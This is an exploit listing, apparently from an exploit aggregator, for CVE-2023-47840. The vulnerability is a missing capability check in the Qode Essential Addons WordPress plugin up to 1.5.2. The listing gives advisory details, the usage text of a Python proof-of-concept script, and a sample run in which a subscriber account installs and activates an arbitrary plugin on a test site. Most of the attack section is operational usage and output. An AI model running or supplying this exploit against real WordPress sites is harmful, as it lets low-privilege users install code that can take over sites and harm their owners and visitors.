## https://sploitus.com/exploit?id=36FC1E3C-2605-5FCD-87C2-E7A230755CCB
# CVE-2023-47840
Qode Essential Addons <= 1.5.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation
### Description:
The Qode Essential Addons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin() function in all versions up to, and including, 1.5.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins.
```
Severity: medium
CVE ID: CVE-2023-47840
CVSS Score: 4.3
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Plugin Slug: qode-essential-addons
WPScan URL: https://www.wpscan.com/plugin/qode-essential-addons
Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/443c59b9-275d-4d17-a870-9ae013c1a5c1
SVN Link: https://plugins.trac.wordpress.org/changeset/2996356/qode-essential-addons/trunk/inc/admin/inc/admin-pages/sub-pages/import/class-qodeessentialaddons-framework-import-plugins.php
Patchstack: https://patchstack.com/database/vulnerability/qode-essential-addons/wordpress-qode-essential-addons-plugin-1-5-2-arbitrary-plugin-installation-and-activation-vulnerability
```
How to use
---
```
usage: CVE-2023-47840.py [-h] --url URL --username USERNAME --password PASSWORD --slug SLUG
Qode Essential Addons <= 1.5.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation Description CVE-2023-47840 - The Qode Essential Addons plugin for WordPress is vulnerable to unauthorized
modification of data due to a missing capability check on the install_plugin() function in all versions up to, and including, 1.5.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to
install and activate arbitrary plugins.
options:
-h, --help show this help message and exit
--url URL URL of the WordPress site
--username USERNAME WordPress username
--password PASSWORD WordPress password
--slug SLUG WordPress Plugin Slug
```
POC
---
```
$ python3 CVE-2023-47840.py --url http://wordpress.lan --username user --password useruser1 --slug olympus-google-fonts
Logged in successfully.
Getting REST API Nonce!
Nonce Found: 1d0f559912
Installing Plugin!
HTTP STATUS: 200 Response:
Activate Plugin!
HTTP STATUS: 200 Response: {"status":"success","message":"Activated","data":null,"redirect":""}
```